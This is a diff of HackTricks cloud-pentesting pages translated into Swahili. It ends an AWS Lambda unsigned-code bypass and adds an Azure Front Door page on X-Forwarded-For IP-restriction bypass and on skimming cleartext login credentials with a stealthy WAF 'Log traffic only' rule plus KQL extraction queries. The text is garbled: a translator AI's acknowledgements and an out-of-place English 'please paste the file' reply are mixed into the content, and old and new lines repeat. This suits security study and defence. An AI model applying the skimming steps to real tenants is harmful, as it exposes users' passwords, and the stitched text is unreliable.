Nimepokea. Nitatafsiri maandishi ya Kiingereza kwenda Kiswahili kwa uwazi na ufupisho bila kupoteza taarifa, huku nikihifadhi kabisa muundo wa markdown/HTML, viungo, paths, tags, majina ya huduma (mfano: aws, gcp), maneno ya kiufundi/mitaala (mfano: code, pentesting, leak) na maneno ya kitaalamu (mfano: Workspace). Sitatafsiri au kubadilisha tags, links, refs au paths, wala sitoongeza maudhui yasiyotakiwa.
Imethibitishwa. Nitatafsiri maandishi ya Kiingereza katika src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc/README.md hadi Kiswahili. Nitahifadhi kabisa sintaksia ya markdown/html, code, majina ya hacking, majina ya cloud/SaaS (mfano: aws, gcp, Workspace), viungo, paths na tags ({#...}) bila kutafsiri. Sitatoa maudhui ya ziada yasiyo kwenye faili.
```bash
aws lambda invoke --function-name $TARGET_FN /tmp/out.json --region $REGION >/dev/null
cat /tmp/out.json
```
Athari inayoweza kutokea: Uwezo wa kusukuma na kuendesha arbitrary unsigned code kwenye function ambayo ilipaswa ku-enforce signed deployments, jambo ambalo linaweza kusababisha code execution kwa function role's permissions.
Athari inayoweza kutokea: Uwezo wa kusukuma na kuendesha msimbo wowote usiosainishwa kwenye function iliyotarajiwa kulazimisha deployments zilizosainishwa, na hivyo kuweza kusababisha utekelezaji wa msimbo kwa ruhusa za role ya function.
Usafishaji:
```bash
aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION || true
```
{{#include ../../../../banners/hacktricks-training.md}}

71
src/pentesting-cloud/azure-security/az-services/az-front-door.md
View File

@@ -1,18 +1,81 @@
# Az - File Shares
# Az - Front Door
{{#include ../../../banners/hacktricks-training.md}}
## RemoteAddr Bypass
Hii **[blog post](https://trustedsec.com/blog/azures-front-door-waf-wtf-ip-restriction-bypass)** inaelezea jinsi unavyoweza kuweka vizuizi vya mtandao na Azure Front Door kwa kuchuja kulingana na **`RemoteAddr`** au **`SocketAddr`**. Tofauti kuu ni kwamba **`RemoteAddr`** inatumia thamani kutoka kwa kichwa cha HTTP **`X-Forwarded-For`** na kufanya iwe rahisi sana kupita.
This **[blog post](https://trustedsec.com/blog/azures-front-door-waf-wtf-ip-restriction-bypass)** unaelezea jinsi unapoweka vikwazo vya mtandao na Azure Front Door unaweza kuchuja kwa kuzingatia **`RemoteAddr`** au **`SocketAddr`**. Tofauti kuu ni kwamba **`RemoteAddr`** inatumia thamani kutoka kwa kichwa cha HTTP **`X-Forwarded-For`**, jambo linalofanya iwe rahisi sana kuiepuka.
Ili kupita sheria hii, zana za kiotomatiki zinaweza kutumika ambazo **brute-force IP addresses** hadi ipate moja halali.
Ili kupitisha kanuni hii, zinaweza kutumika zana za otomatiki ambazo **brute-force IP addresses** hadi zipate anwani halali.
Hii inatajwa katika [Microsoft documentation](https://learn.microsoft.com/en-us/azure/web-application-firewall/afds/waf-front-door-configure-ip-restriction).
Hii imetajwa katika the [Microsoft documentation](https://learn.microsoft.com/en-us/azure/web-application-firewall/afds/waf-front-door-configure-ip-restriction).
## Credential Skimming via WAF Custom Rules + Log Analytics
Kutumia vibaya Azure Front Door (AFD) WAF Custom Rules kwa pamoja na Log Analytics kunasa cleartext credentials (au siri nyingine) zinazopita kupitia WAF. Hii si CVE; ni matumizi mabaya ya vipengele halali na yeyote anayeweza kubadilisha sera ya WAF na kusoma logs zake.
Tabia kuu zinazofanya iwezekane:
- AFD WAF Custom Rules zinaweza kufanana na vipengele vya request ikiwa ni pamoja na headers na POST parameters.
- Wakati Custom Rule inapotumia action Log traffic only, tathmini inaendelea na trafiki inaendelea (hakuna short-circuit), ikihifadhi mtiririko wa kawaida/stealthy.
- AFD inaandika diagnostics za kina kwa Log Analytics chini ya Category FrontDoorWebApplicationFirewallLog. Maelezo ya payload zilizolingana zimo katika details_matches_s pamoja na jina la sheria katika ruleName_s.
### Mtiririko wa kazi kuanzia mwanzo hadi mwisho
1. Identify target POST parameters
- Chunguza fomu ya login na kumbuka majina ya parameter (mf., username, password).
2. Enable diagnostics to Log Analytics
- Katika Front Door profile yako > Monitoring > Diagnostic settings, tuma logs kwa Log Analytics workspace.
- Angalau, washa category: FrontDoorWebApplicationFirewallLog.
3. Create a malicious Custom Rule
- Front Door WAF Policy > Custom rules > New rule:
- Name: jina lisiloonekana hatari, mf., PasswordCapture
- Priority: nambari ndogo (mf., 5) ili itathminiwa mapema
- Match: POST arguments username and password with Operator = Any (match any value)
- Action: Log traffic only
4. Generate events
```bash
curl -i -X POST https://example.com/login \
-H "Content-Type: application/x-www-form-urlencoded" \
--data "username=alice&password=S3cret!"
```
5. Toa credentials kutoka Log Analytics (KQL)
```kusto
AzureDiagnostics
| where Category == "FrontDoorWebApplicationFirewallLog"
| where ruleName_s == "PasswordCapture"
| project TimeGenerated, ruleName_s, details_matches_s
| order by TimeGenerated desc
```
I don't have the contents of src/pentesting-cloud/azure-security/az-services/az-front-door.md. Please paste the file text here and I'll translate it to Swahili, preserving all markdown/html/tags and links as requested.
```kusto
AzureDiagnostics
| where Category == "FrontDoorWebApplicationFirewallLog" and ruleName_s == "PasswordCapture"
| extend m = parse_json(details_matches_s)
| mv-expand match = m.matches
| project TimeGenerated, ruleName_s, match.matchVariableName, match.matchVariableValue
| order by TimeGenerated desc
```
Thamani zilizolingana zinaonekana katika details_matches_s na zinajumuisha cleartext values zilizolingana na rule yako.
### Kwa nini Front Door WAF na sio Application Gateway WAF?
- Application Gateway WAF custom-rule logs hazijumuishi kwa njia ile ile thamani za POST/header zinazosababisha tatizo; AFD WAF diagnostics zinajumuisha matched content katika details, kuruhusu kunasa kredensiali.
### Stealth and variants
- Weka Action kuwa Log traffic only ili kuepuka kuvunja requests na ili rules nyingine ziendelee kutathminiwa kama kawaida.
- Tumia Priority ndogo ya namba ili logging rule yako itathmini kabla ya Block/Allow rules zozote zinazofuata.
- Unaweza kulenga majina/maeneo yoyote nyeti, sio tu POST params (mfano, headers kama Authorization au API tokens katika body fields).
### Masharti
- Kuna instance ya Azure Front Door iliyopo.
- Idhini za kuhariri sera ya AFD WAF na kusoma Log Analytics workspace inayohusiana.
## References
- [https://trustedsec.com/blog/azures-front-door-waf-wtf-ip-restriction-bypass](https://trustedsec.com/blog/azures-front-door-waf-wtf-ip-restriction-bypass)
- [Skimming Credentials with Azure's Front Door WAF](https://trustedsec.com/blog/skimming-credentials-with-azures-front-door-waf)
- [Azure WAF on Front Door monitoring and logging](https://learn.microsoft.com/en-us/azure/web-application-firewall/afds/waf-front-door-monitor)
{{#include ../../../banners/hacktricks-training.md}}